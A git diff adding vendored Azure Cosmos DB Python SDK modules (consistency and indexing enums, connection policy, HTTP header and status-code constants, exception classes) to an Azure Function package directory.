+ """ + + Strong = "Strong" + BoundedStaleness = "BoundedStaleness" + Session = "Session" + Eventual = "Eventual" + ConsistentPrefix = "ConsistentPrefix" + + +class IndexingMode(object): + """Specifies the supported indexing modes. + + :ivar str Consistent: + Index is updated synchronously with a create or update operation. With + consistent indexing, query behavior is the same as the default + consistency level for the collection. + + The index is always kept up to date with the data. + :ivar str Lazy: + Index is updated asynchronously with respect to a create or update + operation. Not supported for new containers since June/2020. + + With lazy indexing, queries are eventually consistent. The index is + updated when the collection is idle. + :ivar str NoIndex: + No index is provided. + + Setting IndexingMode to "None" drops the index. Use this if you don't + want to maintain the index for a document collection, to save the + storage cost or improve the write throughput. Your queries will + degenerate to scans of the entire collection. + """ + + Consistent = "consistent" + Lazy = "lazy" + NoIndex = "none" + + +class IndexKind(object): + """Specifies the index kind of index specs. + + :ivar str IndexKind.Hash: + The index entries are hashed to serve point look up queries. + Can be used to serve queries like: SELECT * FROM docs d WHERE d.prop = 5 + + :ivar str IndexKind.Range: + The index entries are ordered. Range indexes are optimized for + inequality predicate queries with efficient range scans. + Can be used to serve queries like: SELECT * FROM docs d WHERE d.prop > 5 + """ + + Hash = "Hash" + Range = "Range" + + +class PartitionKind(object): + """Specifies the kind of partitioning to be applied. + + :ivar str PartitionKind.Hash: + The partition key definition path is hashed. + """ + + Hash = "Hash" + + +class DataType(object): + """Specifies the data type of index specs. + + :ivar str Number: + Represents a numeric data type. + :ivar str String: + Represents a string data type. + :ivar str Point: + Represents a point data type. + :ivar str LineString: + Represents a line string data type. + :ivar str Polygon: + Represents a polygon data type. + :ivar str MultiPolygon: + Represents a multi-polygon data type. + """ + + Number = "Number" + String = "String" + Point = "Point" + LineString = "LineString" + Polygon = "Polygon" + MultiPolygon = "MultiPolygon" + + +class IndexingDirective(object): + """Specifies whether or not the resource is to be indexed. + + :ivar int Default: + Use any pre-defined/pre-configured defaults. + :ivar int Exclude: + Index the resource. + :ivar int Include: + Do not index the resource. + """ + + Default = 0 + Exclude = 1 + Include = 2 + + +class ConnectionMode(object): + """Represents the connection mode to be used by the client. + + :ivar int Gateway: + Use the Azure Cosmos gateway to route all requests. The gateway proxies + requests to the right data partition. + """ + + Gateway = 0 + + +class PermissionMode(object): + """Enumeration specifying applicability of a permission. + + :ivar str PermissionMode.NoneMode: + None. + :ivar str PermissionMode.Read: + Permission applicable for read operations only. + :ivar str PermissionMode.All: + Permission applicable for all operations. + """ + + NoneMode = "none" # None is python's key word. + Read = "read" + All = "all" + + +class TriggerType(object): + """Specifies the type of a trigger. + + :ivar str TriggerType.Pre: + Trigger should be executed before the associated operation(s). 
+    :ivar str TriggerType.Post:
+        Trigger should be executed after the associated operation(s).
+    """
+
+    Pre = "pre"
+    Post = "post"
+
+
+class TriggerOperation(object):
+    """Specifies the operations on which a trigger should be executed.
+
+    :ivar str TriggerOperation.All:
+        All operations.
+    :ivar str TriggerOperation.Create:
+        Create operations only.
+    :ivar str TriggerOperation.Update:
+        Update operations only.
+    :ivar str TriggerOperation.Delete:
+        Delete operations only.
+    :ivar str TriggerOperation.Replace:
+        Replace operations only.
+    """
+
+    All = "all"
+    Create = "create"
+    Update = "update"
+    Delete = "delete"
+    Replace = "replace"
+
+
+class SSLConfiguration(object):
+    """Configuration for SSL connections.
+
+    See https://requests.readthedocs.io/en/master/user/advanced/#ssl-cert-verification
+    for more information.
+
+    :ivar str SSLKeyFile:
+        The path of the key file for ssl connection.
+    :ivar str SSLCertFile:
+        The path of the cert file for ssl connection.
+    :ivar str SSLCaCerts:
+        The path of the CA_BUNDLE file with certificates of trusted CAs.
+    """
+
+    def __init__(self):
+        self.SSLKeyFile = None
+        self.SSLCertFile = None
+        self.SSLCaCerts = None
+
+
+class ProxyConfiguration(object):
+    """Configuration for a proxy.
+
+    :ivar str Host:
+        The host address of the proxy.
+    :ivar int Port:
+        The port number of the proxy.
+    """
+
+    def __init__(self):
+        self.Host = None
+        self.Port = None
+
+
+class ConnectionPolicy(object):  # pylint: disable=too-many-instance-attributes
+    """Represents the Connection policy associated with a CosmosClientConnection.
+
+    :ivar int RequestTimeout:
+        Gets or sets the request timeout (time to wait for a response from a
+        network peer).
+    :ivar documents.ConnectionMode ConnectionMode:
+        Gets or sets the connection mode used in the client. (Currently only
+        Gateway is supported.)
+    :ivar documents.SSLConfiguration SSLConfiguration:
+        Gets or sets the SSL configuration.
+    :ivar documents.ProxyConfiguration ProxyConfiguration:
+        Gets or sets the proxy configuration.
+    :ivar boolean EnableEndpointDiscovery:
+        Gets or sets endpoint discovery flag for geo-replicated database
+        accounts. When EnableEndpointDiscovery is true, the client will
+        automatically discover the current write and read locations and direct
+        the requests to the correct location, taking into consideration the
+        user's preference (if provided) as PreferredLocations.
+    :ivar list PreferredLocations:
+        Gets or sets the preferred locations for geo-replicated database
+        accounts. When EnableEndpointDiscovery is true and PreferredLocations is
+        non-empty, the client will use this list to evaluate the final location,
+        taking into consideration the order specified in PreferredLocations. The
+        locations in this list are specified as the names of the Azure Cosmos
+        locations like, 'West US', 'East US', 'Central India' and so on.
+    :ivar RetryOptions RetryOptions:
+        Gets or sets the retry options to be applied to all requests when
+        retrying.
+    :ivar boolean DisableSSLVerification:
+        Flag to disable SSL verification for the requests. SSL verification is
+        enabled by default.
+
+        This is intended to be used only when targeting emulator endpoint to
+        avoid failing your requests with SSL related error.
+
+        DO NOT set this when targeting production endpoints.
+    :ivar boolean UseMultipleWriteLocations:
+        Flag to enable writes on any locations (regions) for geo-replicated
+        database accounts in the Azure Cosmos database service.
+ :ivar ConnectionRetryConfiguration: + Retry Configuration to be used for connection retries. + :vartype ConnectionRetryConfiguration: + int or azure.cosmos.ConnectionRetryPolicy or urllib3.util.retry + """ + + __defaultRequestTimeout = 60000 # milliseconds + + def __init__(self): + self.RequestTimeout = self.__defaultRequestTimeout + self.ConnectionMode = ConnectionMode.Gateway + self.SSLConfiguration = None + self.ProxyConfiguration = None + self.EnableEndpointDiscovery = True + self.PreferredLocations = [] + self.RetryOptions = _retry_options.RetryOptions() + self.DisableSSLVerification = False + self.UseMultipleWriteLocations = False + self.ConnectionRetryConfiguration = None + + +class _OperationType(object): + """Represents the type of the operation + """ + Create = "Create" + Delete = "Delete" + ExecuteJavaScript = "ExecuteJavaScript" + Head = "Head" + HeadFeed = "HeadFeed" + Query = "Query" + Read = "Read" + ReadFeed = "ReadFeed" + Recreate = "Recreate" + Replace = "Replace" + SqlQuery = "SqlQuery" + QueryPlan = "QueryPlan" + Update = "Update" + Upsert = "Upsert" + + @staticmethod + def IsWriteOperation(operationType): + return operationType in ( + _OperationType.Create, + _OperationType.Delete, + _OperationType.Recreate, + _OperationType.ExecuteJavaScript, + _OperationType.Replace, + _OperationType.Upsert, + _OperationType.Update, + ) + + @staticmethod + def IsReadOnlyOperation(operationType): + return operationType in ( + _OperationType.Read, + _OperationType.ReadFeed, + _OperationType.Head, + _OperationType.HeadFeed, + _OperationType.Query, + _OperationType.SqlQuery, + ) + + @staticmethod + def IsFeedOperation(operationType): + return operationType in ( + _OperationType.Create, + _OperationType.Upsert, + _OperationType.ReadFeed, + _OperationType.Query, + _OperationType.SqlQuery, + _OperationType.QueryPlan, + _OperationType.HeadFeed, + ) + +class _QueryFeature(object): + NoneQuery = "NoneQuery" + Aggregate = "Aggregate" + CompositeAggregate = "CompositeAggregate" + Distinct = "Distinct" + GroupBy = "GroupBy" + MultipleAggregates = "MultipleAggregates" + MultipleOrderBy = "MultipleOrderBy" + OffsetAndLimit = "OffsetAndLimit" + OrderBy = "OrderBy" + Top = "Top" + +class _DistinctType(object): + NoneType = "None" + Ordered = "Ordered" + Unordered = "Unordered" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/errors.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/errors.py new file mode 100644 index 0000000..0120c8b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/errors.py @@ -0,0 +1,34 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. 
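A sketch of configuring the `ConnectionPolicy` defined above and handing it to the client; the locations are placeholders, and passing the policy via a `connection_policy` keyword is an assumption about how `CosmosClient` builds its policy:

    from azure.cosmos import CosmosClient, documents

    policy = documents.ConnectionPolicy()
    policy.PreferredLocations = ["West US", "East US"]
    policy.UseMultipleWriteLocations = True
    client = CosmosClient(url="https://<account>.documents.azure.com:443/",
                          credential="<key>", connection_policy=policy)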
+ +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Service-specific Exceptions in the Azure Cosmos database service. + +.. warning:: + This module is DEPRECATED. Use `azure.cosmos.exceptions` instead. +""" +import warnings + +from .exceptions import * # pylint: disable=wildcard-import, unused-wildcard-import + +warnings.warn( + "azure.cosmos.errors module is deprecated, use azure.cosmos.exceptions instead", + DeprecationWarning +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/exceptions.py new file mode 100644 index 0000000..8323b1c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/exceptions.py @@ -0,0 +1,82 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Service-specific Exceptions in the Azure Cosmos database service. +""" +from azure.core.exceptions import ( # type: ignore # pylint: disable=unused-import + AzureError, + HttpResponseError, + ResourceExistsError, + ResourceNotFoundError +) +from . import http_constants + + +class CosmosHttpResponseError(HttpResponseError): + """An HTTP request to the Azure Cosmos database service has failed.""" + + def __init__(self, status_code=None, message=None, response=None, **kwargs): + """ + :param int status_code: HTTP response code. + :param str message: Error message. 
+ """ + self.headers = response.headers if response else {} + self.sub_status = None + self.http_error_message = message + status = status_code or (int(response.status_code) if response else 0) + + if http_constants.HttpHeaders.SubStatus in self.headers: + self.sub_status = int(self.headers[http_constants.HttpHeaders.SubStatus]) + formatted_message = "Status code: %d Sub-status: %d\n%s" % (status, self.sub_status, str(message)) + else: + formatted_message = "Status code: %d\n%s" % (status, str(message)) + + super(CosmosHttpResponseError, self).__init__(message=formatted_message, response=response, **kwargs) + self.status_code = status + + +class CosmosResourceNotFoundError(ResourceNotFoundError, CosmosHttpResponseError): + """An HTTP error response with status code 404.""" + + +class CosmosResourceExistsError(ResourceExistsError, CosmosHttpResponseError): + """An HTTP error response with status code 409.""" + + +class CosmosAccessConditionFailedError(CosmosHttpResponseError): + """An HTTP error response with status code 412.""" + + +class CosmosClientTimeoutError(AzureError): + """An operation failed to complete within the specified timeout.""" + + def __init__(self, **kwargs): + message = "Client operation failed to complete within specified timeout." + self.response = None + self.history = None + super(CosmosClientTimeoutError, self).__init__(message, **kwargs) + + +def _partition_range_is_gone(e): + if (e.status_code == http_constants.StatusCodes.GONE + and e.sub_status == http_constants.SubStatusCodes.PARTITION_KEY_RANGE_GONE): + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/http_constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/http_constants.py new file mode 100644 index 0000000..0f222fd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/http_constants.py @@ -0,0 +1,425 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""HTTP Constants in the Azure Cosmos database service. +""" + + +class HttpMethods(object): + """Constants of http methods. + """ + + Get = "GET" + Post = "POST" + Put = "PUT" + Delete = "DELETE" + Head = "HEAD" + Options = "OPTIONS" + + +class HttpHeaders(object): + """Constants of http headers. 
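+    Values are the literal header names used on the wire by the Cosmos REST API.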
+ """ + + Authorization = "authorization" + ETag = "etag" + MethodOverride = "X-HTTP-Method" + Slug = "Slug" + ContentType = "Content-Type" + LastModified = "Last-Modified" + ContentEncoding = "Content-Encoding" + CharacterSet = "CharacterSet" + UserAgent = "User-Agent" + IfModified_since = "If-Modified-Since" + IfMatch = "If-Match" + IfNoneMatch = "If-None-Match" + ContentLength = "Content-Length" + AcceptEncoding = "Accept-Encoding" + KeepAlive = "Keep-Alive" + CacheControl = "Cache-Control" + TransferEncoding = "Transfer-Encoding" + ContentLanguage = "Content-Language" + ContentLocation = "Content-Location" + ContentMd5 = "Content-Md5" + ContentRange = "Content-Range" + Accept = "Accept" + AcceptCharset = "Accept-Charset" + AcceptLanguage = "Accept-Language" + IfRange = "If-Range" + IfUnmodifiedSince = "If-Unmodified-Since" + MaxForwards = "Max-Forwards" + ProxyAuthorization = "Proxy-Authorization" + AcceptRanges = "Accept-Ranges" + ProxyAuthenticate = "Proxy-Authenticate" + RetryAfter = "Retry-After" + SetCookie = "Set-Cookie" + WwwAuthenticate = "Www-Authenticate" + Origin = "Origin" + Host = "Host" + AccessControlAllowOrigin = "Access-Control-Allow-Origin" + AccessControlAllowHeaders = "Access-Control-Allow-Headers" + KeyValueEncodingFormat = "application/x-www-form-urlencoded" + WrapAssertionFormat = "wrap_assertion_format" + WrapAssertion = "wrap_assertion" + WrapScope = "wrap_scope" + SimpleToken = "SWT" + HttpDate = "date" + Prefer = "Prefer" + Location = "Location" + Referer = "referer" + + # Query + Query = "x-ms-documentdb-query" + IsQuery = "x-ms-documentdb-isquery" + IsQueryPlanRequest = "x-ms-cosmos-is-query-plan-request" + SupportedQueryFeatures = "x-ms-cosmos-supported-query-features" + QueryVersion = "x-ms-cosmos-query-version" + + # Our custom DocDB headers + Continuation = "x-ms-continuation" + PageSize = "x-ms-max-item-count" + + # Request sender generated. Simply echoed by backend. 
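+    # The echoed activity id is useful for correlating a client request with service-side diagnostics.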
+ ActivityId = "x-ms-activity-id" + PreTriggerInclude = "x-ms-documentdb-pre-trigger-include" + PreTriggerExclude = "x-ms-documentdb-pre-trigger-exclude" + PostTriggerInclude = "x-ms-documentdb-post-trigger-include" + PostTriggerExclude = "x-ms-documentdb-post-trigger-exclude" + IndexingDirective = "x-ms-indexing-directive" + SessionToken = "x-ms-session-token" + ConsistencyLevel = "x-ms-consistency-level" + XDate = "x-ms-date" + CollectionPartitionInfo = "x-ms-collection-partition-info" + CollectionServiceInfo = "x-ms-collection-service-info" + RetryAfterInMilliseconds = "x-ms-retry-after-ms" + IsFeedUnfiltered = "x-ms-is-feed-unfiltered" + ResourceTokenExpiry = "x-ms-documentdb-expiry-seconds" + EnableScanInQuery = "x-ms-documentdb-query-enable-scan" + EmitVerboseTracesInQuery = "x-ms-documentdb-query-emit-traces" + SubStatus = "x-ms-substatus" + AlternateContentPath = "x-ms-alt-content-path" + IsContinuationExpected = "x-ms-documentdb-query-iscontinuationexpected" + PopulateQueryMetrics = "x-ms-documentdb-populatequerymetrics" + + # Quota Info + MaxEntityCount = "x-ms-root-entity-max-count" + CurrentEntityCount = "x-ms-root-entity-current-count" + CollectionQuotaInMb = "x-ms-collection-quota-mb" + CollectionCurrentUsageInMb = "x-ms-collection-usage-mb" + MaxMediaStorageUsageInMB = "x-ms-max-media-storage-usage-mb" + + # Collection quota + PopulateQuotaInfo = "x-ms-documentdb-populatequotainfo" + PopulatePartitionKeyRangeStatistics = "x-ms-documentdb-populatepartitionstatistics" + + # Usage Info + CurrentMediaStorageUsageInMB = "x-ms-media-storage-usage-mb" + RequestCharge = "x-ms-request-charge" + + # Address related headers. + ForceRefresh = "x-ms-force-refresh" + ItemCount = "x-ms-item-count" + NewResourceId = "x-ms-new-resource-id" + UseMasterCollectionResolver = "x-ms-use-master-collection-resolver" + + # Admin Headers + FullUpgrade = "x-ms-force-full-upgrade" + OnlyUpgradeSystemApplications = "x-ms-only-upgrade-system-applications" + OnlyUpgradeNonSystemApplications = "x-ms-only-upgrade-non-system-applications" + UpgradeFabricRingCodeAndConfig = "x-ms-upgrade-fabric-code-config" + IgnoreInProgressUpgrade = "x-ms-ignore-inprogress-upgrade" + UpgradeVerificationKind = "x-ms-upgrade-verification-kind" + IsCanary = "x-ms-iscanary" + + # Version headers and values + Version = "x-ms-version" + + # RDFE Resource Provider headers + OcpResourceProviderRegisteredUri = "ocp-resourceprovider-registered-uri" + + # For Document service management operations only. This is in + # essence a 'handle' to (long running) operations. + RequestId = "x-ms-request-id" + + # Object returning this determines what constitutes state and what + # last state change means. For replica, it is the last role change. + LastStateChangeUtc = "x-ms-last-state-change-utc" + + # Offer type. + OfferType = "x-ms-offer-type" + OfferThroughput = "x-ms-offer-throughput" + + # Custom RUs/minute headers + DisableRUPerMinuteUsage = "x-ms-documentdb-disable-ru-per-minute-usage" + IsRUPerMinuteUsed = "x-ms-documentdb-is-ru-per-minute-used" + OfferIsRUPerMinuteThroughputEnabled = "x-ms-offer-is-ru-per-minute-throughput-enabled" + + # Partitioned collection headers + PartitionKey = "x-ms-documentdb-partitionkey" + EnableCrossPartitionQuery = "x-ms-documentdb-query-enablecrosspartition" + PartitionKeyRangeID = "x-ms-documentdb-partitionkeyrangeid" + + # Upsert header + IsUpsert = "x-ms-documentdb-is-upsert" + + # Index progress headers. 
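+    # Returned by the service to report background index transformation progress.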
+ IndexTransformationProgress = "x-ms-documentdb-collection-index-transformation-progress" + LazyIndexingProgress = "x-ms-documentdb-collection-lazy-indexing-progress" + + # Client generated retry count response header + ThrottleRetryCount = "x-ms-throttle-retry-count" + ThrottleRetryWaitTimeInMs = "x-ms-throttle-retry-wait-time-ms" + + # StoredProcedure related headers + EnableScriptLogging = "x-ms-documentdb-script-enable-logging" + ScriptLogResults = "x-ms-documentdb-script-log-results" + + # Change feed + AIM = "A-IM" + IncrementalFeedHeaderValue = "Incremental feed" + + # For Using Multiple Write Locations + AllowTentativeWrites = "x-ms-cosmos-allow-tentative-writes" + + # Dedicated Gateway headers + DedicatedGatewayCacheStaleness = "x-ms-dedicatedgateway-max-age" + IntegratedCacheHit = "x-ms-cosmos-cachehit" + + +class HttpHeaderPreferenceTokens(object): + """Constants of http header preference tokens. + """ + + PreferUnfilteredQueryResponse = "PreferUnfilteredQueryResponse" + + +class HttpStatusDescriptions(object): + """Constants of http status descriptions. + """ + + Accepted = "Accepted" + Conflict = "Conflict" + OK = "Ok" + PreconditionFailed = "Precondition Failed" + NotModified = "Not Modified" + NotFound = "Not Found" + BadGateway = "Bad Gateway" + BadRequest = "Bad Request" + InternalServerError = "Internal Server Error" + MethodNotAllowed = "MethodNotAllowed" + NotAcceptable = "Not Acceptable" + NoContent = "No Content" + Created = "Created" + UnsupportedMediaType = "Unsupported Media Type" + LengthRequired = "Length Required" + ServiceUnavailable = "Service Unavailable" + RequestEntityTooLarge = "Request Entity Too Large" + Unauthorized = "Unauthorized" + Forbidden = "Forbidden" + Gone = "Gone" + RequestTimeout = "Request timed out" + GatewayTimeout = "Gateway timed out" + TooManyRequests = "Too Many Requests" + RetryWith = "Retry the request" + + +class QueryStrings(object): + """Constants of query strings. + """ + + Filter = "$filter" + GenerateId = "$generateFor" + GenerateIdBatchSize = "$batchSize" + GetChildResourcePartitions = "$getChildResourcePartitions" + Url = "$resolveFor" + RootIndex = "$rootIndex" + Query = "query" + SQLQueryType = "sql" + + # RDFE Resource Provider query strings + ContentView = "contentview" + Generic = "generic" + + +class CookieHeaders(object): + """Constants of cookie headers. + """ + + SessionToken = "x-ms-session-token" + + +class Versions(object): + """Constants of versions. + """ + CurrentVersion = "2018-12-31" + SDKName = "azure-cosmos" + QueryVersion = "1.0" + + +class Delimiters(object): + """Constants of delimiters. + """ + + ClientContinuationDelimiter = "!!" + ClientContinuationFormat = "{0}!!{1}" + + +class HttpListenerErrorCodes(object): + """Constants of http listener error codes. + """ + + ERROR_OPERATION_ABORTED = 995 + ERROR_CONNECTION_INVALID = 1229 + + +class HttpContextProperties(object): + """Constants of http context properties. + """ + + SubscriptionId = "SubscriptionId" + + +class _ErrorCodes(object): + """Constants of error codes. 
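+    Low-level OS socket error codes used to classify connection-level failures.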
+ """ + + # Windows Socket Error Codes + WindowsInterruptedFunctionCall = 10004 + WindowsFileHandleNotValid = 10009 + WindowsPermissionDenied = 10013 + WindowsBadAddress = 10014 + WindowsInvalidArgumnet = 10022 + WindowsResourceTemporarilyUnavailable = 10035 + WindowsOperationNowInProgress = 10036 + WindowsAddressAlreadyInUse = 10048 + WindowsConnectionResetByPeer = 10054 + WindowsCannotSendAfterSocketShutdown = 10058 + WindowsConnectionTimedOut = 10060 + WindowsConnectionRefused = 10061 + WindowsNameTooLong = 10063 + WindowsHostIsDown = 10064 + WindowsNoRouteTohost = 10065 + + # Linux Error Codes + LinuxConnectionReset = 131 + + +class StatusCodes(object): + """HTTP status codes returned by the REST operations + """ + + # Success + OK = 200 + CREATED = 201 + ACCEPTED = 202 + NO_CONTENT = 204 + + NOT_MODIFIED = 304 + + # Client Error + BAD_REQUEST = 400 + UNAUTHORIZED = 401 + FORBIDDEN = 403 + NOT_FOUND = 404 + METHOD_NOT_ALLOWED = 405 + REQUEST_TIMEOUT = 408 + CONFLICT = 409 + GONE = 410 + PRECONDITION_FAILED = 412 + REQUEST_ENTITY_TOO_LARGE = 413 + TOO_MANY_REQUESTS = 429 + RETRY_WITH = 449 + + INTERNAL_SERVER_ERROR = 500 + SERVICE_UNAVAILABLE = 503 + + # Operation pause and cancel. These are FAKE status codes for QOS logging purpose only. + OPERATION_PAUSED = 1200 + OPERATION_CANCELLED = 1201 + + +class SubStatusCodes(object): + """Sub status codes returned by the REST operations specifying the details of the operation + """ + + UNKNOWN = 0 + + # 400: Bad Request Substatus + PARTITION_KEY_MISMATCH = 1001 + CROSS_PARTITION_QUERY_NOT_SERVABLE = 1004 + + # 410: StatusCodeType_Gone: substatus + NAME_CACHE_IS_STALE = 1000 + PARTITION_KEY_RANGE_GONE = 1002 + COMPLETING_SPLIT = 1007 + COMPLETING_PARTITION_MIGRATION = 1008 + + # 403: Forbidden Substatus. 
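+    # WRITE_FORBIDDEN (3) is returned, for example, when a write is attempted against a read-only region.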
+ WRITE_FORBIDDEN = 3 + PROVISION_LIMIT_REACHED = 1005 + DATABASE_ACCOUNT_NOT_FOUND = 1008 + REDUNDANT_COLLECTION_PUT = 1009 + SHARED_THROUGHPUT_DATABASE_QUOTA_EXCEEDED = 1010 + SHARED_THROUGHPUT_OFFER_GROW_NOT_NEEDED = 1011 + AAD_REQUEST_NOT_AUTHORIZED = 5300 + + # 404: LSN in session token is higher + READ_SESSION_NOTAVAILABLE = 1002 + OWNER_RESOURCE_NOT_FOUND = 1003 + + # 409: Conflict exception + CONFLICT_WITH_CONTROL_PLANE = 1006 + + # 503: Service Unavailable due to region being out of capacity for bindable partitions + INSUFFICIENT_BINDABLE_PARTITIONS = 1007 + + +class ResourceType(object): + """Types of resources in Azure Cosmos + """ + + Database = "dbs" + Collection = "colls" + User = "users" + Document = "docs" + Permission = "permissions" + StoredProcedure = "sprocs" + Trigger = "triggers" + UserDefinedFunction = "udfs" + Conflict = "conflicts" + Attachment = "attachments" + PartitionKeyRange = "pkranges" + Schema = "schemas" + Offer = "offers" + Topology = "topology" + DatabaseAccount = "databaseaccount" + + @staticmethod + def IsCollectionChild(resourceType): + return resourceType in ( + ResourceType.Document, + ResourceType.Attachment, + ResourceType.Conflict, + ResourceType.Schema, + ResourceType.UserDefinedFunction, + ResourceType.Trigger, + ResourceType.StoredProcedure, + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/offer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/offer.py new file mode 100644 index 0000000..1392194 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/offer.py @@ -0,0 +1,36 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create throughput properties in the Azure Cosmos DB SQL API service. +""" +from typing import Dict, Any + + +class ThroughputProperties(object): + """Represents the throughput properties in an Azure Cosmos DB SQL API container. + To read and update throughput properties use the associated methods on the :class:`Container`. 
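+
+    :ivar offer_throughput: The provisioned throughput in request units per second.
+    :ivar properties: The raw offer properties, if available.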
+ """ + + def __init__(self, offer_throughput, properties=None): # pylint: disable=super-init-not-called + # type: (int, Dict[str, Any]) -> None + self.offer_throughput = offer_throughput + self.properties = properties + + +Offer = ThroughputProperties diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/partition_key.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/partition_key.py new file mode 100644 index 0000000..f7fcd76 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/partition_key.py @@ -0,0 +1,88 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create partition keys in the Azure Cosmos DB SQL API service. +""" + + +class NonePartitionKeyValue(object): + """Represents None value for partitionKey when it's missing in a container. + 